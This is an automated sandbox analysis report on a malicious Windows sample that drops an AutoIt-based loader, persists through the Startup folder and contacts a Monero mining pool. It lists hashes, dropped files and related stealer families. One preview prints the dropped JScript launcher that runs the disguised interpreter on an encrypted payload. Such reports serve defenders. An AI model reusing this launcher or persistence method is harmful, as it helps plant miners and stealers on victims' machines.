                          http://www.entrust.net/rpa03file.exefalse
                            		high
                            http://crl.cloudflare.com/origin_ca.crlexplorer.exe, 00000012.00000002.3265796424.0000000005480000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://aia.entrust.net/ts1-chain256.cer01file.exefalse
                                		high
                                http://crl.cloudflare.com/origin_ca.crl0explorer.exe, 00000012.00000003.2611556085.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354530325.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354580125.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3264505846.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2703373555.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354530325.00000000013C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://ocsp.cloudflare.com/origin_caexplorer.exe, 00000012.00000003.2642127911.0000000001335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3264409592.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.autoitscript.com/autoit3/XReynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, Reynolds.com, 0000000A.00000000.2066097134.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp, ZeusChat.scr, 00000010.00000000.2205239967.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp, Reynolds.com, 00000011.00000000.2255000492.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2411864117.0000000015614000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr, 00000014.00000000.2409093623.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp, ZeusChat.scr, 00000015.00000000.2415165241.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.drfalse
                                      		high
                                      http://nsis.sf.net/NSIS_ErrorErrorfile.exefalse
                                        		high
                                        http://www.autoitscript.com/autoit3/Reynolds.com, ZeusChat.scrfalse
                                          		high
                                          https://github.com/horsicq/DIE-engineexplorer.exe, 00000012.00000002.3264299114.00000000012F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.entrust.net/ts1ca.crl0file.exefalse
                                              		high
                                              https://www.autoitscript.com/autoit3/Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.drfalse
                                                		high
                                                http://crl.entrust.net/2048ca.crl0file.exefalse
                                                  		high
                                                  https://www.entrust.net/rpa0file.exefalse
                                                    		high

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    163.172.171.111
                                                    		xmr-eu2.nanopool.orgUnited Kingdom
                                                    		12876OnlineSASFRfalse

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1561926
                                                    Start date and time:2024-11-24 20:24:08 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 7m 36s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:25
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:file.exe
                                                    Detection:MAL
                                                    Classification:mal100.rans.expl.evad.mine.winEXE@38/58@3/1
                                                    EGA Information:
                                                    • Successful, ratio: 80%
                                                    HCA Information:
                                                    • Successful, ratio: 53%
                                                    • Number of executed functions: 29
                                                    • Number of non-executed functions: 340
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target ZeusChat.scr, PID 4444 because there are no executed function
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                    • VT rate limit hit for: file.exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    14:24:57API Interceptor1x Sleep call for process: file.exe modified
                                                    14:26:37API Interceptor2151x Sleep call for process: explorer.exe modified
                                                    20:25:06AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    163.172.171.111E5r67vtBtc6.exeGet hashmaliciousXmrigBrowse
                                                      Miner-XMR2.exeGet hashmaliciousXmrigBrowse
                                                        file.exeGet hashmaliciousGlupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc, XmrigBrowse
                                                          zg9ZjvXyS0.exeGet hashmaliciousXmrigBrowse

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            xmr-eu2.nanopool.orgfile.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                            • 51.15.89.13
                                                            file.exeGet hashmaliciousXmrigBrowse
                                                            • 51.195.43.17
                                                            file.exeGet hashmaliciousXmrigBrowse
                                                            • 51.15.61.114
                                                            ICBM.exeGet hashmaliciousXmrigBrowse
                                                            • 51.15.61.114
                                                            ICBM.exeGet hashmaliciousXmrigBrowse
                                                            • 51.68.137.186
                                                            ICBM.exeGet hashmaliciousXmrigBrowse
                                                            • 51.68.137.186
                                                            ICBM.exeGet hashmaliciousXmrigBrowse
                                                            • 51.195.138.197
                                                            ICBM.exeGet hashmaliciousXmrigBrowse
                                                            • 51.195.43.17
                                                            ICBM.exeGet hashmaliciousXmrigBrowse
                                                            • 51.210.150.92
                                                            file.exeGet hashmaliciousXmrigBrowse
                                                            • 163.172.171.111

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            OnlineSASFRhttps://og.oomaal.in/Get hashmaliciousUnknownBrowse
                                                            • 163.172.253.2
                                                            sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 151.115.247.92
                                                            Lreticupdwy.exeGet hashmaliciousUnknownBrowse
                                                            • 62.210.129.110
                                                            Lreticupdwy.exeGet hashmaliciousUnknownBrowse
                                                            • 62.210.129.110
                                                            mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 212.129.25.56
                                                            XzCRLowRXn.exeGet hashmaliciousUnknownBrowse
                                                            • 51.158.201.235
                                                            Unit 2_week 4 2024.pptxGet hashmaliciousHTMLPhisherBrowse
                                                            • 212.129.3.113
                                                            TT copy.exeGet hashmaliciousFormBookBrowse
                                                            • 195.154.200.15
                                                            amen.x86.elfGet hashmaliciousMiraiBrowse
                                                            • 151.115.247.87
                                                            mNtu4X8ZyE.exeGet hashmaliciousEmotetBrowse
                                                            • 51.15.7.145

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            C:\Users\user\AppData\Local\Temp\29442\Reynolds.comfile.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                              file.exeGet hashmaliciousXmrigBrowse
                                                                SecuriteInfo.com.Win32.Malware-gen.8775.19492.exeGet hashmaliciousUnknownBrowse
                                                                  O8scEm3rJN.exeGet hashmaliciousUnknownBrowse
                                                                    KeyFormed.exeGet hashmaliciousUnknownBrowse
                                                                      wWk9NkXYcL.exeGet hashmaliciousUnknownBrowse
                                                                        eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                          7CTH165fQv.exeGet hashmaliciousLatrodectusBrowse
                                                                            Fj8bSgJTob.exeGet hashmaliciousUnknownBrowse
                                                                              Fj8bSgJTob.exeGet hashmaliciousUnknownBrowse
                                                                                C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrfile.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                  file.exeGet hashmaliciousXmrigBrowse
                                                                                    SecuriteInfo.com.Win32.Malware-gen.8775.19492.exeGet hashmaliciousUnknownBrowse
                                                                                      O8scEm3rJN.exeGet hashmaliciousUnknownBrowse
                                                                                        KeyFormed.exeGet hashmaliciousUnknownBrowse
                                                                                          wWk9NkXYcL.exeGet hashmaliciousUnknownBrowse
                                                                                            eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                              7CTH165fQv.exeGet hashmaliciousLatrodectusBrowse
                                                                                                Fj8bSgJTob.exeGet hashmaliciousUnknownBrowse
                                                                                                  Fj8bSgJTob.exeGet hashmaliciousUnknownBrowse

                                                                                                    Created / dropped Files

                                                                                                    C:\Users\user\AppData\Local\CyberSphere Dynamics\M

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\29442\Reynolds.com
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3677337
                                                                                                    Entropy (8bit):7.999944173773252
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:98304:Sd+C1vXUPV85t2oyHCO+0WKt1M3ymwbvVraEB0jPnyk5pKgVKCn:Sd+6vXUKyoU+0WKt1MCmAraEsf95MYn
                                                                                                    MD5:C5718114F703C816800F6BBFDA267EF6
                                                                                                    SHA1:2608C20BA78181641E8A396295DD6F920546DFC6
                                                                                                    SHA-256:F7896C752B429245764E615DEF6319D3790688F7694A493304B4A40599F9F335
                                                                                                    SHA-512:E38E5A3949EF87294ECD705EF27A727B1A139F89F0D5EB4184AB4EB4009CFC58213C746176139220DB1F0AF756316912654AD7A037225FF3329A044B32B80B8B
                                                                                                    Malicious:true
                                                                                                    Preview:.I.h....N.N..04vT..6......@..W..o...5xRz.)...I..i...WO...f..?.....y....t.f.:E^..r..x.(...q.;.n...A-..6.....~ ..w/...v.P..O...g_.Sx.E.."\..6h.~....~..V"...Z....`.+....e...M.E.P....ck!.T...AM....R..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....G.L.'.F...h..............>.......>......kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..|.&..,P..Myn.2..t.W....^.8.Z!...W[.>..8D...>...i..m......_.}8.5...x..2).U.j....R>..#.~.\.......$h_.8..D..X.U..~X...)<.G...]...P9(..f/.._..c.Y.^...g[.T.bg.D....w$ .x9...#.K..{).....A...V*..!.+.f./J>I5.._yN`.7l..M.....a2.....||>...z.QRG........K.G..;.rda(..{.l5<...d...Q.....x.=.4..W?_8.<Oj<..;...hy.C.."x....x....g..0.Q..i. /.j...v8...iH.>...

                                                                                                    C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\29442\Reynolds.com
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):179
                                                                                                    Entropy (8bit):4.71590743776702
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:RiMIpGXIdPHo55wWAX+aJp6/h4EkD5mcVI9zRLBpHFZo5uWAX+aJp6/h4EkD5mcf:RiJBJHonwWDaJ0/hJkDR6VRLvHFywWDS
                                                                                                    MD5:BF7E76FB66EBF1EB9824F7FF48B31194
                                                                                                    SHA1:C0D778C07BFCD6474209761EC7A0818B72AD6E9D
                                                                                                    SHA-256:AE70150097558C8B2178AF62EBA146A0A66CAA99EE1C6E443A7FCC094536CA60
                                                                                                    SHA-512:3905C7D7D05B8D11F8DD7688C5912E3D60DD4BE617A199582A7503308F1299300AB464EAF1D67BDE3105492F713ECE73176CC5764067656125D629A52B7F609A
                                                                                                    Malicious:true
                                                                                                    Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\CyberSphere Dynamics\\ZeusChat.scr\" \"C:\\Users\\user\\AppData\\Local\\CyberSphere Dynamics\\M\"")

                                                                                                    C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\29442\Reynolds.com
                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1065128
                                                                                                    Entropy (8bit):6.43820773264071
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:SAwciuvaj8l4LEWumcKYB5Wek2vY+BYssmNolbmmPmJ4Ve+aaWBS:SALTBaLETmcKYB5WH2AwjsLbmmPmJ4Vt
                                                                                                    MD5:C63860691927D62432750013B5A20F5F
                                                                                                    SHA1:03678170AADF6BAB2AC2B742F5EA2FD1B11FECA3
                                                                                                    SHA-256:69D2F1718EA284829DDF8C1A0B39742AE59F2F21F152A664BAA01940EF43E353
                                                                                                    SHA-512:3357CB6468C15A10D5E3F1912349D7AF180F7BD4C83D7B0FD1A719A0422E90D52BE34D9583C99ABECCDB5337595B292A2AA025727895565F3A6432CAB46148DE
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: SecuriteInfo.com.Win32.Malware-gen.8775.19492.exe, Detection: malicious, Browse
                                                                                                    • Filename: O8scEm3rJN.exe, Detection: malicious, Browse
                                                                                                    • Filename: KeyFormed.exe, Detection: malicious, Browse
                                                                                                    • Filename: wWk9NkXYcL.exe, Detection: malicious, Browse
                                                                                                    • Filename: eSLlhErJ0q.exe, Detection: malicious, Browse
                                                                                                    • Filename: 7CTH165fQv.exe, Detection: malicious, Browse
                                                                                                    • Filename: Fj8bSgJTob.exe, Detection: malicious, Browse
                                                                                                    • Filename: Fj8bSgJTob.exe, Detection: malicious, Browse
                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........1.q.P.".P.".P."y..".P."y.."QP."y..".P."S.1".P.".8.#.P.".8.#.P.".8.#.P.".(u".P.".(q".P.".(e".P.".P.".R."^9.#.P."^9.#.P."^9.".P.".Pa".P."^9.#.P."Rich.P."........PE..d......^.........."......:...(.......R.........@.........................................`...@...............@..............................[..|.......h....@..To...$..........t....p......................X...(...0p...............P..8............................text....9.......:.................. ..`.rdata...A...P...B...>..............@..@.data...P........P..................@....pdata..To...@...p..................@..@.rsrc...h............@..............@..@.reloc..t...........................@..B................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\29442\Reynolds.com

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1065128
                                                                                                    Entropy (8bit):6.43820773264071
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:SAwciuvaj8l4LEWumcKYB5Wek2vY+BYssmNolbmmPmJ4Ve+aaWBS:SALTBaLETmcKYB5WH2AwjsLbmmPmJ4Vt
                                                                                                    MD5:C63860691927D62432750013B5A20F5F
                                                                                                    SHA1:03678170AADF6BAB2AC2B742F5EA2FD1B11FECA3
                                                                                                    SHA-256:69D2F1718EA284829DDF8C1A0B39742AE59F2F21F152A664BAA01940EF43E353
                                                                                                    SHA-512:3357CB6468C15A10D5E3F1912349D7AF180F7BD4C83D7B0FD1A719A0422E90D52BE34D9583C99ABECCDB5337595B292A2AA025727895565F3A6432CAB46148DE
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: SecuriteInfo.com.Win32.Malware-gen.8775.19492.exe, Detection: malicious, Browse
                                                                                                    • Filename: O8scEm3rJN.exe, Detection: malicious, Browse
                                                                                                    • Filename: KeyFormed.exe, Detection: malicious, Browse
                                                                                                    • Filename: wWk9NkXYcL.exe, Detection: malicious, Browse
                                                                                                    • Filename: eSLlhErJ0q.exe, Detection: malicious, Browse
                                                                                                    • Filename: 7CTH165fQv.exe, Detection: malicious, Browse
                                                                                                    • Filename: Fj8bSgJTob.exe, Detection: malicious, Browse
                                                                                                    • Filename: Fj8bSgJTob.exe, Detection: malicious, Browse
                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........1.q.P.".P.".P."y..".P."y.."QP."y..".P."S.1".P.".8.#.P.".8.#.P.".8.#.P.".(u".P.".(q".P.".(e".P.".P.".R."^9.#.P."^9.#.P."^9.".P.".Pa".P."^9.#.P."Rich.P."........PE..d......^.........."......:...(.......R.........@.........................................`...@...............@..............................[..|.......h....@..To...$..........t....p......................X...(...0p...............P..8............................text....9.......:.................. ..`.rdata...A...P...B...>..............@..@.data...P........P..................@....pdata..To...@...p..................@..@.rsrc...h............@..............@..@.reloc..t...........................@..B................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\29442\l

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3677337
                                                                                                    Entropy (8bit):7.999944173773252
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:98304:Sd+C1vXUPV85t2oyHCO+0WKt1M3ymwbvVraEB0jPnyk5pKgVKCn:Sd+6vXUKyoU+0WKt1MCmAraEsf95MYn
                                                                                                    MD5:C5718114F703C816800F6BBFDA267EF6
                                                                                                    SHA1:2608C20BA78181641E8A396295DD6F920546DFC6
                                                                                                    SHA-256:F7896C752B429245764E615DEF6319D3790688F7694A493304B4A40599F9F335
                                                                                                    SHA-512:E38E5A3949EF87294ECD705EF27A727B1A139F89F0D5EB4184AB4EB4009CFC58213C746176139220DB1F0AF756316912654AD7A037225FF3329A044B32B80B8B
                                                                                                    Malicious:true
                                                                                                    Preview:.I.h....N.N..04vT..6......@..W..o...5xRz.)...I..i...WO...f..?.....y....t.f.:E^..r..x.(...q.;.n...A-..6.....~ ..w/...v.P..O...g_.Sx.E.."\..6h.~....~..V"...Z....`.+....e...M.E.P....ck!.T...AM....R..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....G.L.'.F...h..............>.......>......kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..|.&..,P..Myn.2..t.W....^.8.Z!...W[.>..8D...>...i..m......_.}8.5...x..2).U.j....R>..#.~.\.......$h_.8..D..X.U..~X...)<.G...]...P9(..f/.._..c.Y.^...g[.T.bg.D....w$ .x9...#.K..{).....A...V*..!.+.f./J>I5.._yN`.7l..M.....a2.....||>...z.QRG........K.G..;.rda(..{.l5<...d...Q.....x.=.4..W?_8.<Oj<..;...hy.C.."x....x....g..0.Q..i. /.j...v8...iH.>...

                                                                                                    C:\Users\user\AppData\Local\Temp\Actual

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64512
                                                                                                    Entropy (8bit):7.997410116453677
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:768:p2pG4gYr39J5QO8CifS5JEvkX0rdE0XxYav4npFMxs6RVmyqSpLGeNzqDdr2UosR:CG4gYzCO8CzuvnLxZ/f32drtOaQVTQ
                                                                                                    MD5:88A17BE0C7D698A8222DA655CEC1985F
                                                                                                    SHA1:2517799B7A0881C360EF0BAE427508FDEA450444
                                                                                                    SHA-256:2F57B20C75DA4681D05B98A6B3B20276395FB549BC035AEC4DAE6D3671231E73
                                                                                                    SHA-512:C96F85878FFF7328134F85EE1C4849D82484C960185CE04FAFB89894E51CFDF2B7AF81A72AFED2D2A1E604351EA3D0F8BE8852FF5FC221306718D167D48CB67B
                                                                                                    Malicious:true
                                                                                                    Preview:.Q.*=..R...a]....-........)!.Lx1..Y..ZL.%.(q>.c.._$.{.9.;...k......e.al.2.&.2..(.oRI..{...{.w.......U..I....v2o.......h..!s6.sw...9...a.5i?gM>..../h..4..A.:.:.@......f.(...ps< F.T.9b%M.6..F4.6?....~..tV.U.=J..C.......U.z9,..=...<t.p.....v.".J..t_-...N....d.....0,...COG.,.......ni<[..#.@...a.;r.p..l4.k.....FN..J.u.P....zqJ..q...U........].ym."W....0.d\..*?g.;....@75.....Y...!.V2y.Y.W...G.]...G..M..g.j.t2...-.MO.&..m.t...!h:.8..s1...?z....0......W._..l.p...-.{.iw....K..b2..v.3vw.R.....H.w....l.Q.5....h|N.#wW.|...%ho.....Z.6.R...w2~.asiLNm.7.....Yy.8...P.=B.P=b)<.!...Q...<..`P.E(.J....}UTo....P..PG.7..g.......YF......f...H.7A.q..:..?O...D...2..`.|.'G....aH.M....X.....C}..:..^...$...A c~.np2n......w....=.c.!.2..).?..`..=s..I.H.0#.).W....l......8..K-..'D....R...&+.:.z....$.@..e...t.>..B.CM.}R....[..L=M]%-.3.?........e.._vkEz.M.:u.....Ap..a.B..|M..]I{lx...n.G...:....Kp...0........:...Vo..........*'..s...m]".....N.N)..f.ve..j87Q9Y.,..i.Q

                                                                                                    C:\Users\user\AppData\Local\Temp\Ai

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):73728
                                                                                                    Entropy (8bit):7.9976461887667
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:OqKZtFBQ4yLVvzRHvrBSuKeBkzzmgfgfJH1XHnjdua:Oq23BQLfP9SuKlRfERx
                                                                                                    MD5:1C5BCCD3C6CEBB00CE3E1563C51BBEA5
                                                                                                    SHA1:7109CE0ADB4C3338A0A8AD12D29D94F885D80C8C
                                                                                                    SHA-256:9B5547FE418E6B43A52E59E1D64964D1301168283556F2FF30BBB6113BED0554
                                                                                                    SHA-512:6AA079DFFB9199FA596EB83CBE6F80BEA8EC95C069CEE9D14C44877E5E4E3A0E8C39F94FC832AAE5C3B2AD4966BE6FA49DD2D9B51ABB4FC1266E776B8218D66F
                                                                                                    Malicious:true
                                                                                                    Preview:.....|{.l;.....p..0.....n...F..?wHCm\.9....q..2..@/;......o=..y..8...@W......z..q..l.o...f.:../.....5...a.R..w..V..7..?m.E.......hz.dq..^.j.S....}..E.&...Z......g^..S..^....o>.....m..So...e:..R.j.7.z.`W..5..U.........f6....LUs..!.-..k..H...0 ..C...9.<.~......c0..c.t*`.\..xr...G,...A..+.....n\...A....5.O.FI.....a..zP....0..7t.+...q.r.R...zr..;"|.....R........U[..\t{H......J../je...u.]..(Rn....?...).......Q......s..J.#..Fx..p.KI.}.Txy..5..v.x.vZ....F.M.8.....y.....O]...).Gv.....z.,.[...M..|.pl......P6U..W.....5y...?.KA....F...Tt.<..0](!..B..\...yL=.aR..`..(#....h=..3P[.pTw...[.].,.$..T...u_.?....f.^..B..w`..-@+5...T......~..0.O.I./).NZ.d..gP...wFy.1a.B..K.+.."=..7B.{.GPL....$_...d..E......<..y....4.....~Y...@. ..8W..;<y.4....u...Gs...d.*....~..5..P.:.UY.Z..H.s...P...N.....|.f.......P.....W.R..S&.D.*..\..7Y.p...P..X.\.f)#..N.......'.)...E..C..Z_...........q...S..1[%....ac..W.z./...b.....E.<d7...G.t.%...Tk.;E,.I.......eJi/.......m.

                                                                                                    C:\Users\user\AppData\Local\Temp\Americans

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):83968
                                                                                                    Entropy (8bit):7.9976001147327125
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:7P1bpShADfQc/58M2DMF1Z3XqKx4O9BUrC+JpsADRfRgfG0k/jFdTG5:7P1whADfQ0P/fhXqmb9m2eAIT6
                                                                                                    MD5:344621DEA0EE974945ADCEE99B5BD517
                                                                                                    SHA1:536F9C1AD6081983670AFB4F7E88E648E24175BB
                                                                                                    SHA-256:D1BC6E174CC46F6E8D242378B5A38A34CED585ED8D294A1D1079A7DEC9A6237D
                                                                                                    SHA-512:8864F337AB431CF28B147EE3E74E9D971332825658587C5215BA47D9A6FF1392FA7EF5C3BFF3CF38BCACB15B662540400A497445583B4B77B81D81BB5694E310
                                                                                                    Malicious:true
                                                                                                    Preview:.rnr..<.g*..o.^..p...h..t(k|...cLU...........s./.G..0.....e.J.9?....!.w..2'.$`...o.I..-...r..Ev].LmA.......MD.w..>...G.-a.;.o$.h..#.....8..;.M.K.....A.....E....}e......P.u._..z.@[dq...$.......P.dv@f.8a .`\.,...W@.&.".3.X..Z#....`6x=`ZhXw....|...n.s.U=.t...x<a.....[.jk......b..6..../.6.:.s.z..*ix.)..47O......].._..-.....\.Q..n?.\.Z.,....^..nD}.w....j..B..}6i.o.c...^......MW....2..u......o.|.5......j.K.@d..Xco".2X...euH........f..V...N..N4....\.]Za1........O`^Z...sU..Ft...|.yR.o.".f.U..+..X8.....n..=..X.3.....Y...w....E..&'....M...UJM....}q9=..S......Q....[4.zpL.,')......NiV....j..y..%".FT{W...d.V1...f...r.....:.....)M..^X.H.a.GF.y..s.qx.w...~.|.66......j...;Xm.T..A..t............y.@.Ps~PN.D...F.....s.$h..x.9Dk...I....m.d..m.._=VMg...a......y.<..S.'L.....6J...5....i..)Z...+.#9..Y...\..,4..r?."oL.....d.^....+..[.Bzl.........}&.(..Y.f?$g.."......V...1...Y....h..ees....^....-.D....0.7...d....9.s ...r~s.r.K..l..F..t M.p.Z.$7.s.a..Ps.L./..

                                                                                                    C:\Users\user\AppData\Local\Temp\Biodiversity

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):96256
                                                                                                    Entropy (8bit):7.998160366275236
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:gTEnlZ1AxGpyKOALxCqREIv7CoAzVxeX5t99O5o9AagdBIxDIcZeL2Gx5:gTS8GgKrdCWEIDxyveXBOaWeSD2G
                                                                                                    MD5:E4A02EA210673BA79BC58DC5B99394E1
                                                                                                    SHA1:9B374BEC27EC9B87440841460678C6F2E1240687
                                                                                                    SHA-256:7FE058D75C2BF56E1D9CBBD95CE11BAC0468FA4A5AB1AC8EB001F9D5D4A5D527
                                                                                                    SHA-512:EE99AA3FA5E558C6906852563FD06DF9628E0D0DC3EFCA6D228E1AC164753920FE52BB26E1B3FB8F59B05C9EDD2922D9556D9B43297BB9E45F65D0C48601020F
                                                                                                    Malicious:true
